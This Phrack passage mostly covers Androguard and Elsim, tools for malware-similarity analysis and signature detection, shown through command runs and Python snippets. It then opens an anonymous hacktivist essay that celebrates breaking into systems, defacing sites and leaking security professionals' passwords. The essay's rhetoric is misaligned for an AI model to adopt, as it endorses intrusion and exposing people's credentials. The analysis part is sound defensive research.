--> Lcom/reg/ParseXml; getXMLIntElement
|
|
(Ljava/lang/String; Ljava/lang/String;)I 55
|
|
|
|
Lcom/reg/MainRegActivity; getCountry ()Ljava/lang/String; 13
|
|
--> Lcom/reg/MainRegActivity; getCountry
|
|
()Ljava/lang/String; 13
|
|
|
|
Lcom/reg/MainRegActivity$5; onReceive (Landroid/content/Context;
|
|
Landroid/content/Intent;)V 35
|
|
--> Lcom/reg/MainRegActivity$5; onReceive
|
|
(Landroid/content/Context; Landroid/content/Intent;)V 35
|
|
|
|
Lcom/reg/MainRegActivity$1; (Lcom/reg/MainRegActivity;)V 6
|
|
--> Lcom/reg/MainRegActivity$1;
|
|
(Lcom/reg/MainRegActivity;)V 6
|
|
|
|
Lcom/reg/MainRegActivity$S_itm; (Lcom/reg/MainRegActivity;)V 21
|
|
--> Lcom/reg/MainRegActivity$S_itm;
|
|
(Lcom/reg/MainRegActivity;)V 21
|
|
[...]
|
|
NEW methods:
|
|
DELETED methods:
|
|
SKIPPED methods:
|
|
#########################################################################
|
|
|
|
Basically we are able to determine if two samples are from the same malware
|
|
family. If they are, the analyst can start his analysis from the similar
|
|
methods.
|
|
|
|
In the next part we will see how to display the differences (which
instructions have been modified) between two similar methods. If we test
the tool with two samples from different families (like opfake and foncy)
we observe the following:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/malwares/opfake/\
|
|
b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
|
|
apks/malwares/foncy/\
|
|
01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5
|
|
|
|
Elements:
|
|
IDENTICAL: 1
|
|
SIMILAR: 0
|
|
NEW: 2
|
|
DELETED: 38
|
|
SKIPPED: 0
|
|
--> methods: 33.333333% of similarities
|
|
#########################################################################
|
|
|
|
We get a misleading similarity score because all methods, including very
small ones, have been compared. We can skip small methods with the "-s"
option (which filters on the size of the method in bytes):
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/malwares/opfake/\
|
|
b79106465173490e07512aa6a182b5da558ad2d4f6fae038101796b534628311
|
|
apks/malwares/foncy/\
|
|
01f6f6379543f4aaa0d6b8dcd682f4e2b106527584b3645eb674f1646faccad5 -s 10
|
|
|
|
Elements:
|
|
IDENTICAL: 0
|
|
SIMILAR: 0
|
|
NEW: 2
|
|
DELETED: 29
|
|
SKIPPED: 33
|
|
--> methods: 0.000000% of similarities
|
|
#########################################################################
|
|
|
|
We can do a lot of things with this kind of tool, such as:
- detecting plagiarism between two Android applications
- checking whether an application is correctly protected by an obfuscator
- easily extracting injected code (if you know the original application)
|
|
|
|
There are many other interesting "ways" to use this tool such as
|
|
discovering if malware samples have been written by the same author, or if
|
|
some pieces of code have been reused. Analyzing the "faketoken" [7] sample
|
|
and the "opfake.d" sample we have observed an interesting result.
|
|
|
|
The first sample "faketoken" is detected by 19/43 antivirus products on
|
|
VirusTotal [8]. The second sample "opfake.d" is detected by 16/41 antivirus
|
|
products on VirusTotal [9]. All of these antivirus products are using
|
|
different names with the exception of DrWeb.
|
|
|
|
Now if we run our tool we observe the following output:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/plagiarism/opfake/\
|
|
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
|
|
apks/plagiarism/opfake/\
|
|
61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac
|
|
|
|
Elements:
|
|
IDENTICAL: 951
|
|
SIMILAR: 5
|
|
NEW: 34
|
|
DELETED: 23
|
|
SKIPPED: 0
|
|
--> methods: 96.516954% of similarities
|
|
#########################################################################
|
|
|
|
We can skip specific libraries common to these samples such as
|
|
"Lorg/simpleframework/xml" and methods of small sizes. This provides us
|
|
with an even more interesting result:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
apks/plagiarism/opfake/\
|
|
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79
|
|
apks/plagiarism/opfake/\
|
|
61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac
|
|
-e "Lorg/simpleframework/" -s 100 -d
|
|
|
|
Elements:
|
|
IDENTICAL: 9
|
|
SIMILAR: 3
|
|
NEW: 14
|
|
DELETED: 11
|
|
SKIPPED: 5260
|
|
--> methods: 44.998713% of similarities
|
|
|
|
SIMILAR methods:
|
|
Ltoken/bot/MainApplication; loadStartSettings
|
|
(Ljava/lang/String;)Ltoken/bot/StartSettings; 230
|
|
--> Lcom/load/wap/MainApplication; loadStartSettings
|
|
(Ljava/lang/String;)Lcom/load/wap/StartSettings; 190 0.375
|
|
|
|
Ltoken/bot/MainService; threadOperationRun
|
|
(I Ljava/lang/Object;)V 197
|
|
--> Lcom/load/wap/MainService; threadOperationRun
|
|
(I Ljava/lang/Object;)V 122 0.319999992847
|
|
|
|
Ltoken/bot/ServerResponse; ()V 133
|
|
--> Lcom/load/wap/ServerResponse; ()V 125 0.214285716414
|
|
|
|
IDENTICAL methods:
|
|
Ltoken/bot/Settings; isDeleteMessage (Ljava/lang/String;
|
|
Ljava/lang/String;)Z 132
|
|
--> Lcom/load/wap/Settings; isDeleteMessage
|
|
(Ljava/lang/String; Ljava/lang/String;)Z 132
|
|
|
|
Ltoken/bot/UpdateActivity; setMainScreen ()V 107
|
|
--> Lcom/load/wap/UpdateActivity; setMainScreen ()V 107
|
|
|
|
Ltoken/bot/MainApplication; sendGetRequest (Ljava/lang/String;
|
|
Ljava/util/List;)V 132
|
|
--> Lcom/load/wap/MainApplication; sendGetRequest
|
|
(Ljava/lang/String; Ljava/util/List;)V 132
|
|
|
|
Ltoken/bot/MainService; onStart (Landroid/content/Intent; I)V 106
|
|
--> Lcom/load/wap/MainService; onStart
|
|
(Landroid/content/Intent; I)V 106
|
|
|
|
Ltoken/bot/MainApplication; sendPostRequest (Ljava/lang/String;
|
|
Ljava/util/List;)V 197
|
|
--> Lcom/load/wap/MainApplication; sendPostRequest
|
|
(Ljava/lang/String; Ljava/util/List;)V 197
|
|
|
|
Ltoken/bot/MainApplication; DownloadApk (Ljava/lang/String;
|
|
Ljava/lang/String;)Z 106
|
|
--> Lcom/load/wap/MainApplication; DownloadApk
|
|
(Ljava/lang/String; Ljava/lang/String;)Z 106
|
|
|
|
Ltoken/bot/Settings; isCatchMessage (Ljava/lang/String;
|
|
Ljava/lang/String;)Ltoken/bot/CatchResult; 165
|
|
--> Lcom/load/wap/Settings; isCatchMessage
|
|
(Ljava/lang/String; Ljava/lang/String;)
|
|
Lcom/load/wap/CatchResult; 165
|
|
|
|
Ltoken/bot/MainApplication; getContacts
|
|
(Landroid/content/Context;)Ljava/util/Vector; 230
|
|
--> Lcom/load/wap/MainApplication; getContacts
|
|
(Landroid/content/Context;)Ljava/util/Vector; 230
|
|
|
|
Ltoken/bot/MainApplication; dateFromString
|
|
(Ljava/lang/String;)Ljava/util/Date; 103
|
|
--> Lcom/load/wap/MainApplication; dateFromString
|
|
(Ljava/lang/String;)Ljava/util/Date; 103
|
|
#########################################################################
|
|
|
|
As we can see, the names of the methods are exactly the same and the
signatures (and thus, with high probability, the bytecode) are the same.
This can be really useful to detect whether your software has been ripped
off by someone.
|
|
|
|
----[ 3.2 Differences between two applications
|
|
|
|
Up to this point, we have a tool which is able to recognize similar
|
|
methods, but we would like more information about the differences between
|
|
each method.
|
|
|
|
For that we will apply the same algorithm, but we will change the
"granularity" and focus on basic blocks in order to extract differences.
However, in this specific case, we will not use our classical signature for
each basic block but rather a simple "string" which represents its sequence
of instructions. So, finally, as in the previous algorithm, we will have:
- identical basic blocks
- similar basic blocks
- new basic blocks
- deleted basic blocks
|
|
|
|
With the list of similar basic blocks, we can apply a standard "diff"
algorithm between each pair of similar basic blocks to know which
instructions have been added or removed.
|
|
|
|
The Longest Common Subsequence (LCS) algorithm [11] can then be used to
obtain all the differences. In order to apply the LCS algorithm, we map
each unique instruction to a single character:
|
|
|
|
ADD 3 -> "\x00"
ADD 1 -> "\x01"
MOV 3 -> "\x02"
ADD 3 -> "\x00"
|
|
|
|
If we have two basic blocks, we must translate each basic block into a
|
|
final string:
|
|
|
|
ADD 3
|
|
ADD 1
|
|
SUB 2
|
|
IGET => "\x00\x01\x02\x03\x00\x04"
|
|
ADD 3
|
|
GOTO
|
|
|
|
ADD 3
|
|
ADD 3
|
|
SUB 2
|
|
IGET => "\x00\x00\x02\x03\x05\x04"
|
|
MUL 4
|
|
GOTO
|
|
|
|
The application of the LCS algorithm [11] between these two strings
reveals which instructions have been added or removed:
|
|
|
|
#########################################################################
In [5]: from elsim_dalvik import LCS
In [7]: a = "\x00\x01\x02\x03\x00\x04"
In [9]: b = "\x00\x00\x02\x03\x05\x04"
In [10]: z = LCS(a, b)

In [12]: from elsim_dalvik import getDiff
In [13]: l_a = []
In [14]: l_r = []
In [15]: getDiff(z, a, b, len(a), len(b), l_a, l_r)
In [16]: l_a
Out[16]: [(1, '\x00'), (4, '\x05')]
# "ADD 3" and "MUL 4" have been added in the second basic block
In [17]: l_r
Out[17]: [(1, '\x01'), (4, '\x00')]
# "ADD 1" and "ADD 3" have been removed from the first basic block
#########################################################################
|
|
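For readers who want to reproduce the idea without Elsim, a self-contained
dynamic-programming LCS diff (hypothetical helper names, not the
elsim_dalvik API) gives the same result on these two strings:

#########################################################################
def lcs_table(a, b):
    n, m = len(a), len(b)
    t = [[0] * (m + 1) for _ in range(n + 1)]
    for i in range(n):
        for j in range(m):
            if a[i] == b[j]:
                t[i + 1][j + 1] = t[i][j] + 1
            else:
                t[i + 1][j + 1] = max(t[i][j + 1], t[i + 1][j])
    return t

def diff(a, b):
    t, i, j = lcs_table(a, b), len(a), len(b)
    removed, added = [], []
    while i > 0 or j > 0:
        if i > 0 and j > 0 and a[i - 1] == b[j - 1]:
            i, j = i - 1, j - 1
        elif j > 0 and (i == 0 or t[i][j - 1] >= t[i - 1][j]):
            added.append((j - 1, b[j - 1]))
            j -= 1
        else:
            removed.append((i - 1, a[i - 1]))
            i -= 1
    return sorted(removed), sorted(added)

a = "\x00\x01\x02\x03\x00\x04"
b = "\x00\x00\x02\x03\x05\x04"
print(diff(a, b))
# ([(1, '\x01'), (4, '\x00')], [(1, '\x00'), (4, '\x05')])
#########################################################################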
|
|
Although it's also possible to use a better algorithm such as
Needleman-Wunsch [10] (used in biology for sequence alignment [12], or in
the comparison of network traces [35]), our tests have shown that the LCS
algorithm is sufficient.
|
|
|
|
Now, we have a new tool called "androdiff.py" which can be used to extract
|
|
and observe differences between two Android applications. We have tested it
|
|
against two versions of the Skype application to analyze the patch of a
|
|
security vulnerability [13] (mainly due to incorrect use of file
|
|
permissions):
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsim.py -i
|
|
elsim/examples/android/com.skype.raider_1.0.0.831.apk
|
|
elsim/examples/android/com.skype.raider_1.0.0.983.apk -c BZ2
|
|
|
|
Elements:
|
|
IDENTICAL: 2059
|
|
SIMILAR: 167
|
|
NEW: 27
|
|
DELETED: 0
|
|
SKIPPED: 0
|
|
--> methods: 98.192539% of similarities
|
|
#########################################################################
|
|
|
|
We have several methods to analyze, but only a few new methods are present,
|
|
and two of them are particularly interesting:
|
|
|
|
#########################################################################
|
|
Lcom/skype/ipc/SkypeKitRunner; chmod (Ljava/io/File;
|
|
Ljava/lang/String;)Z 61
|
|
Lcom/skype/ipc/SkypeKitRunner; fixPermissions ([Ljava/io/File;)V 47
|
|
#########################################################################
|
|
|
|
So we can now search the similar methods to find where these new methods
are called:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androdiff.py -i
|
|
elsim/examples/android/com.skype.raider_1.0.0.831.apk
|
|
elsim/examples/android/com.skype.raider_1.0.0.983.apk -d
|
|
[...]
|
|
[ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ] <->
|
|
[ ('Lcom/skype/ipc/SkypeKitRunner;', 'run', '()V') ]
|
|
run-BB@0xae run-BB@0xae
|
|
Added Elements(2)
|
|
0xba 3 invoke-virtual v8 , [ meth@ 5897
|
|
Ljava/security/MessageDigest; reset ['()', 'V'] ]
|
|
0xc0 4 sget-object v9 , [ field@ 1299
|
|
Lcom/skype/ipc/SkypeKitRunner; [B MAITSEAINE ]
|
|
Deleted Elements(0)
|
|
|
|
run-BB@0x320 run-BB@0x316
|
|
Added Elements(1)
|
|
0x332 5 const/4 v8 , [ #+ 0 ] // {0}
|
|
Deleted Elements(1)
|
|
0x328 5 const/4 v8 , [ #+ 3 ] // {3}
|
|
|
|
run-BB@0x352 run-BB@0x348
|
|
Added Elements(1)
|
|
0x364 4 const-string v5 , [ string@ 2921 'chmod 750 ' ]
|
|
Deleted Elements(1)
|
|
0x35a 4 const-string v5 , [ string@ 2904 'chmod 777 ' ]
|
|
|
|
run-BB@0x52c run-BB@0x522
|
|
Added Elements(10)
|
|
0x59e 29 invoke-virtual v4 , [ meth@ 109
|
|
Landroid/content/Context; getFilesDir ['()', 'Ljava/io/File;'] ]
|
|
0x5a4 30 move-result-object v4
|
|
0x5a6 31 invoke-virtual v4 , [ meth@ 5719
|
|
Ljava/io/File; getAbsolutePath ['()',
|
|
'Ljava/lang/String;'] ]
|
|
0x5ac 32 move-result-object v4
|
|
0x5be 37 move-object/from16 v0 , v19
|
|
0x5c2 38 iget-object v0 , v0 , [ field@ 1314
|
|
Lcom/skype/ipc/SkypeKitRunner;
|
|
Landroid/content/Context; mContext ]
|
|
0x5c6 39 move-object v4 , v0
|
|
0x5d8 44 move-object/from16 v0 , v19
|
|
0x5dc 45 move-object v1 , v4
|
|
0x5de 46 invoke-direct v0 , v1 , [ meth@ 1923
|
|
Lcom/skype/ipc/SkypeKitRunner; fixPermissions
|
|
['([Ljava/io/File;)', 'V'] ]
|
|
Deleted Elements(0)
|
|
[...]
|
|
#########################################################################
|
|
|
|
As you can see, some constants are changed (3 to 0, 777 to 750) to patch
the incorrect use of file permissions; you need to look at the original CFG
to view the details (maybe a future version will display the results in a
single CFG). A new method is also called to fix the permissions of existing
files.
|
|
|
|
----[ 3.3 Looking for a signature in applications
|
|
|
|
Now, if you wish to detect whether a specific method (or class) is present
in another application, you need to compare all the methods of that
application against your method.
|
|
|
|
Moreover, if we have a database of signatures, we must check whether each
signature is present in our application. For example, if the database
contains 1000 signatures and the application contains 1000 methods, we need
to perform:
- 1000 * 1000 -> 1,000,000 comparisons to know the result
|
|
|
|
That's why we need another solution, and we will use the second algorithm
(2.2). This algorithm needs a set of float values to perform the
clustering, so in this example we will use different sources of entropy.
|
|
|
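To picture why the clustering saves comparisons, here is a deliberately
naive sketch: instead of real k-means clustering (as used by Elsign), a
simple distance filter on the entropy vectors selects the few candidates
worth an expensive NCD comparison:

#########################################################################
# only elements whose entropy vector is close to the signature's vector
# are kept for the costly string comparison (simplified illustration)
def euclid(u, v):
    return sum((a - b) ** 2 for a, b in zip(u, v)) ** 0.5

def candidates(sign_vector, elements, radius=1.0):
    # elements: list of (entropy_vector, signature_string) tuples
    return [e for e in elements if euclid(sign_vector, e[0]) < radius]

sign  = [4.49, 4.96, 4.94, 0.0]
elems = [([4.49, 4.96, 4.94, 0.0], "HELLO WORLD..."),
         ([2.0, 3.0, 4.0, 5.0], "something else entirely")]
print(len(candidates(sign, elems)))   # 1 -> a single NCD comparison left
#########################################################################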
|
We have already described the generic algorithm (2.2), so we only need to
|
|
define our element in this implementation. An element (in fact a part of
|
|
our signature) will be composed of:
|
|
- a string which represents the method (or the class)
|
|
(in fact it is a signature obtained by the grammar (3.1))
|
|
- a set of entropies (float values)
|
|
|
|
The most important part is the set of entropies. We use several sources of
entropy to get better results, since an Android application provides a lot
of exploitable information. One source is the API that is used (the
Android/Java API). Another is the exceptions, because they characterize a
method very well. We can also use the entropy of the signature and of the
bytecode. There may be some redundancy between these entropies (the entropy
of the signature already covers both the Android/Java packages and the
exceptions), so this needs more work, but it will not produce false
positives.
|
|
|
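To give an idea of the shape of these float values, the sketch below
computes a plain Shannon entropy over two views of a method; the actual
Elsign sources of entropy (including the "descriptional entropy") differ,
so real values will not be identical:

#########################################################################
# illustrative entropy vector for one element
import math

def shannon(data):
    if not data:
        return 0.0
    counts = {}
    for c in data:
        counts[c] = counts.get(c, 0) + 1
    n = float(len(data))
    return -sum(v / n * math.log(v / n, 2) for v in counts.values())

signature = "B[P1{Landroid/telephony/SmsManager;sendTextMessage}G]B[G]"
bytecode  = "invoke-virtual sget-object const-string invoke-static"
print([shannon(signature), shannon(bytecode)])
#########################################################################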
|
We also define a simple JSON file from which our signature is generated:
the information (such as the entropies) is extracted and added to a
database. We take the "logastrod" [14] malware and create the signature
after analyzing the sample, in order to pick its most interesting malicious
parts:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ cat signatures/logastrod.sign
|
|
[ { "SAMPLE" :
|
|
"apks/malwares/logastrod/ \
|
|
f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983"
|
|
}, { "BASE" : "AndroidOS", "NAME" : "Logastrod", "SIGNATURE" :
|
|
[ { "TYPE" :
|
|
"METHSIM", "CN" : "Lcom/pavel/newmodule/RuleActivity;", "MN" : "onCreate",
|
|
"D" : "(Landroid/os/Bundle;)V" }, { "TYPE" : "METHSIM", "CN" :
|
|
"Lcom/pavel/newmodule/LicenseActivity;", "MN" : "onCreate", "D" :
|
|
"(Landroid/os/Bundle;)V" } ], "BF" : "a && b" } ]
|
|
#########################################################################
|
|
|
|
The name of this signature is "Logastrod", and both methods must be
recognized (as required by the Boolean formula) to make a positive match.
|
|
|
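Since the .sign format is plain JSON, listing which methods have to be
located is straightforward; the sketch below relies only on the fields
visible in the file above:

#########################################################################
# read a .sign file and print the methods that must be matched
import json

with open("signatures/logastrod.sign") as f:
    data = json.load(f)

meta = data[1]                      # data[0] only points to the sample
print("name    : " + meta["NAME"])
print("formula : " + meta["BF"])
for item in meta["SIGNATURE"]:
    print(" ".join([item["TYPE"], item["CN"], item["MN"], item["D"]]))
#########################################################################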
|
By using the "androcsign.py" tool we can extract the entropies and
|
|
signatures of the methods from the specified sample, and add it to our
|
|
database:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androcsign.py -i signatures/logastrod.sign -d
|
|
signatures/dbandroguard
|
|
[{u'Logastrod': [[[0, 'Qlt[...]kdd',
|
|
4.809434597538392, 4.584117420715886, 4.538809415871831, 0.0]], u'a && b'
|
|
]}]
|
|
#########################################################################
|
|
|
|
Now it is possible to use "androsign.py" to check a particular file or an
|
|
entire directory by using a database of signatures.
|
|
|
|
"f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9" is a
|
|
sample of this "logastrod" malware:
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsign.py -i
|
|
apks/malwares/logastrod/f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36
|
|
659cb809f13d9 -b signatures/dbandroguard -c signatures/dbconfig -v
|
|
[SIGN:69 CLUSTERS:10
|
|
CMP_CLUSTERS:8 ELEMENTS:31 CMP_ELEMENTS:39 -> 2139 1.823282%] [[91, 92,
|
|
0.27931034564971924], [91, 93, 0.18803419172763824]] ----> Logastrod
|
|
#########################################################################
|
|
|
|
As you can see, we have only done "39" comparisons thanks to the
|
|
clustering. Without this method, "2139" comparisons would have been
|
|
required for the same result.
|
|
|
|
#########################################################################
|
|
d@t0t0:~/androguard$ ./androsign.py -d apks/malwares/logastrod/ -b
|
|
signatures/dbandroguard -c signatures/dbconfig
|
|
f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 : ---->
|
|
Logastrod
|
|
a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 : ---->
|
|
Logastrod
|
|
77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de : ---->
|
|
Logastrod
|
|
fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f : ---->
|
|
Logastrod
|
|
f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 : ---->
|
|
Logastrod
|
|
e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 : ---->
|
|
Logastrod
|
|
#########################################################################
|
|
|
|
We can see that on VirusTotal these samples are not detected by all AV
products, and the detection rates differ slightly between samples:
|
|
|
|
#########################################################################
|
|
f22affca4ea15e58d8b4d345e54a7910b03c37fa70941bbcf36659cb809f13d9 :
|
|
22/43 antivirus
|
|
a0a42b9f1d45a0e09a8da6d9ce8e74952340a538251d0e697cfe1b16e5ac6696 :
|
|
19/43 antivirus
|
|
77943921c7d6bad5f2e45fa22df4c23d034021ae56f0b09ecac8efb97830e0de :
|
|
22/43 antivirus
|
|
fea4dd75dfc4bfe279faf0b7675c48166ecac57bc8e8436c277a6da20582892f :
|
|
21/43 antivirus
|
|
f18891b20623ad35713e7f44feade51a1fd16030af55056a45cefa3f5f38e983 :
|
|
19/43 antivirus
|
|
e45caa25f87531cff2ee2803374ac78de0757941dd1311e3411ce4cdf6d5d942 :
|
|
21/43 antivirus
|
|
#########################################################################
|
|
|
|
We maintain an open source database of Android malware [15] where you can
find analysis links and a few signatures for Android malware. The main
difficulty is creating a signature, because you must choose carefully which
method/class to add to the database in order to avoid false positives as
much as possible. In other words, don't add a method/class coming from a
free or proprietary "API" or project to a malware database :)
|
|
|
|
You can also use this tool to check whether your application has been
stolen by someone else, by running it over multiple files. Imagine that you
have created an uber open source && l33t algorithm and you wish to know
whether your algorithm has been ripped off and included in proprietary
software. Of course, it is possible to build databases of many "things",
from a database of cryptographic functions to a DNA database...
|
|
|
|
--[ 4 - Conclusion
|
|
|
|
Similarity is a difficult problem, but it is possible to achieve
interesting results by using the NCD and the entropy on "normalized" data.
|
|
|
|
So, at the end of this paper, you will find two tools. The first one is
Androguard, in its first stable 1.0 version. Androguard is a well-known
Python framework to manipulate, reverse engineer, and play with Android
applications. The stable version we release with this paper brings a lot of
new things (especially the stability of the similarity tools) and a few
tips and tricks to reverse engineer Android apps (such as dealing with
non-ASCII names).
|
|
|
|
In this framework, several tools use the new open source software Elsim to
search for similarities/dissimilarities between different sets of elements.
We have described two kinds of "generic" algorithms. The first one can be
used if you wish to find the similarities between two sets of elements.
The second one can be used if you have a database of signatures and you
need a quick engine to search for these signatures in a set of elements.
|
|
|
|
Finally, we described a new entropy measure ("descriptional entropy")
which can be used to classify an element and obtain more information from
it, and two new algorithms which can help you answer a similarity
"problem".
|
|
|
|
But Elsim is not limited to Android applications: the tool will be
improved in the coming months to support x86 and ARM binaries, in order to
provide open source software with such capabilities.
|
|
|
|
Many thanks to the Phrack staff for the suggestions on how to improve this
|
|
work.
|
|
|
|
"Talk is cheap. Show me the code". Torvalds, Linus"
|
|
|
|
--[ 5 - References
|
|
|
|
[1] Androguard. http://code.google.com/p/androguard/
|
|
[2] Silvio Cesare (2010). "Classification of malware using structured
|
|
control flow".
|
|
[3] MacQueen, J. B. (1967). "Some Methods for classification and Analysis
|
|
of Multivariate Observations".
|
|
[4] Android source code (dalvik). http://source.android.com/
|
|
[5] Foncy Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#foncy
|
|
[6] Opfake Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#opfake_\
|
|
(all)
|
|
[7] Faketoken Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#faketoken
|
|
[8] https://www.virustotal.com/file/\
|
|
f7c36355c706fc9dd8954c096825e0613807e0da4bd7f3de97de0aec0be23b79/analysis/
|
|
[9] https://www.virustotal.com/file/\
|
|
61da462a03d8651a6088958b438b44527973601e604e3ca18cb7aa0b3952d2ac/analysis/
|
|
[10] Needleman, Saul B and Wunsch, Christian D. (1970). "A general method
|
|
applicable to the search for similarities in the amino acid sequence
|
|
of two proteins"
|
|
[11] L. Bergroth and H. Hakonen and T. Raita (2000). "A Survey of Longest
|
|
Common Subsequence Algorithms".
|
|
[12] Sequence Alignement. http://en.wikipedia.org/wiki/Sequence_alignment
|
|
[13] Android Police. http://www.androidpolice.com/2011/04/14/\
|
|
exclusive-vulnerability-in-skype-for-android-is-exposing-your-name\
|
|
-phone-number-chat-logs-and-a-lot-more/.
|
|
[14] Logastrod Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares#Logastrod
|
|
[15] Opensource Database of Android Malware.
|
|
http://code.google.com/p/androguard/wiki/DatabaseAndroidMalwares
|
|
[16] Manuel Cebrian, Manuel Alfonseca and Alfonso Ortega. "Common Pitfalls
|
|
Using Normalized Compression Distance: What to Watch Out for in a
|
|
Compressor"
|
|
[17] R. Cilibrasi and P. M. B. Vitanyi. "Clustering by compression"
|
|
[18] Kolmogorov A. N (1965). "Three Approaches for Defining the Concept
|
|
of Information Quantity"
|
|
[19] Snappy compressor. http://code.google.com/p/snappy/
|
|
[20] Cilibrasi, R. & Vitanyi, P. (2005). "Clustering by compression"
|
|
[21] Dullien, T. & Rolles, R. (2005). "Graph-based comparison of
|
|
executable objects"
|
|
[22] M. Li and P. Vitanyi (1997). "An introduction to Kolmogorov
|
|
Complexity and Its Applications"
|
|
[23] D. Sankoff and J. Kruskal (1983, 1989).
|
|
"Time warps, string edits and macromolecules"
|
|
[24] J. Shallit, M.-W. Wang. "Automatic Complexity of Strings".
|
|
[25] T. Sabin. "Comparing binaries with graph isomorphisms".
|
|
http://razor.bindview.com/publish/papers/comparingbinaries.html
|
|
[26] Wikipedia: http://en.wikipedia.org/wiki/Kolmogorov_complexity
|
|
[27] Jesus Freke. http://code.google.com/p/smali/
|
|
[28] http://en.wikipedia.org/wiki/Cluster_analysis
|
|
[29] A. D. Danaksok and F. G. Gologlu, On Lempel-Ziv. "Complexity of
|
|
Sequences"
|
|
[30] Lempel, A., Ziv, J. "On the complexity of finite sequences"
|
|
[31] S. Janson, S. Lonardi and W. Szpankowski. "On average sequence
|
|
complexity"
|
|
[32] J. Shallit. "On the maximum number of distinct factors in a
|
|
binary string"
|
|
[33] http://www.c-sharpcorner.com/uploadfile/acinonyx72/calculating\
|
|
-the-normalized-compression-distance-between-two-strings/$
|
|
[34] SMILES
|
|
http://en.wikipedia.org/wiki/Simplified_molecular-input_line-entry_system
|
|
[35] Netzob http://www.netzob.org/
|
|
|
|
--[ 6 - Code
|
|
|
|
|
|
--[ EOF
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x10 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=----------------------=[ Lines in the Sand: ]=-------------------------=|
|
|
|=-----------=[ Which Side Are You On in the Hacker Class War ]=---------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ by Anonymous ]=----------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
---
|
|
|
|
With dramatically growing hacker and leaker activity paralleling the
|
|
revolutionary upheavals around the world, we are increasingly hearing the
|
|
rhetoric of "cyberwar" thrown around by governments attempting to maintain
|
|
legitimacy and exercise more police-state powers. In talking about the
|
|
FBI's priorities ten years after 9/11, FBI director Robert Mueller stated
|
|
in a recent speech at the International Association of Chiefs of
|
|
Police(IACP) conference that "the next threat will be cyber-based ...
|
|
self-radicalized individuals using online resources and individuals
|
|
planning cyber attacks" [21]. Although hackers made a mockery of Mueller
|
|
and the IACP during the conference by defacing their websites, it is hard
|
|
to believe that hackers are a bigger threat than the "terrorists". Still,
|
|
this logic is being used to send many more billions of dollars into white
|
|
hat pockets at private military and intelligence contracted corporations to
|
|
develop better defensive and offensive technology. The US is also proposing
|
|
several changes to the 1986 Computer Fraud and Abuse Act, providing
|
|
increased sentences (including mandatory minimums) as well as RICO Act
|
|
classifications for computer hacking. For the most part, the increased
|
|
hacker busts have largely targeted small-time defacers and DDoS kids
|
|
allegedly affiliated with Anonymous - hardly the "foreign terrorist threat
|
|
to critical infrastructure" used to justify the proposed increased
|
|
penalties for hackers and increased cashflow to the security industry. But
|
|
there's more than small timers at play: attacks against high profile
|
|
institutions including law enforcement, military and corporate targets have
|
|
escalated, becoming both more destructive as well as more politically
|
|
articulate. We're experiencing the opening stages of the next Hacker Class
|
|
War, and with many factions at play each operating with their own agenda
|
|
and strategies, with more and more hackers breaking into shit for the rev
|
|
or selling out to the military intelligence industrial complex, the
|
|
question is asked "which side are you on"?
|
|
|
|
U.S. military officials, eager to talk about how the Pentagon has boosted
|
|
its computer defenses, often remain quiet when asked about its offensive
|
|
Internet capabilities. A list of cyber capabilities-- available only to
|
|
policymakers-- is described as ranging from planting a computer virus to
|
|
bringing down electric grids [1]. This would not be possible if it were not
|
|
for the assistance of computer hackers working directly or indirectly for
|
|
the Department of Defense, as well as the tendency in our communities to
|
|
support or tolerate those who choose to do so. Unfortunately, this
|
|
mentality is frequently espoused by figureheads commonly quoted in
|
|
mainstream news articles, where they claim to speak on behalf of the hacker
|
|
community. Conversely, there has always been resentment from black hats and
|
|
the criminally minded for the corporate sellouts who claim to be hackers
|
|
but instead choose to protect systems against those who actually break into
|
|
them. Much has been written about the corrupt white hats who work to
|
|
protect vital infrastructure against other, more fun-loving hackers. Many
|
|
lulz have been had over the years every time these big shots get owned and
|
|
all of their emails and passwords are released in nicely formatted .txt
|
|
files. Besides FBI collaborating fucks and security "professionals", it is
|
|
time to call out the other emerging threat to the integrity of our scene:
|
|
the US military's active effort to train and recruit hackers into aiding US
|
|
cyber "defense" systems.
|
|
|
|
With the passage of the 2012 Defense Authorization bill, the DoD has
|
|
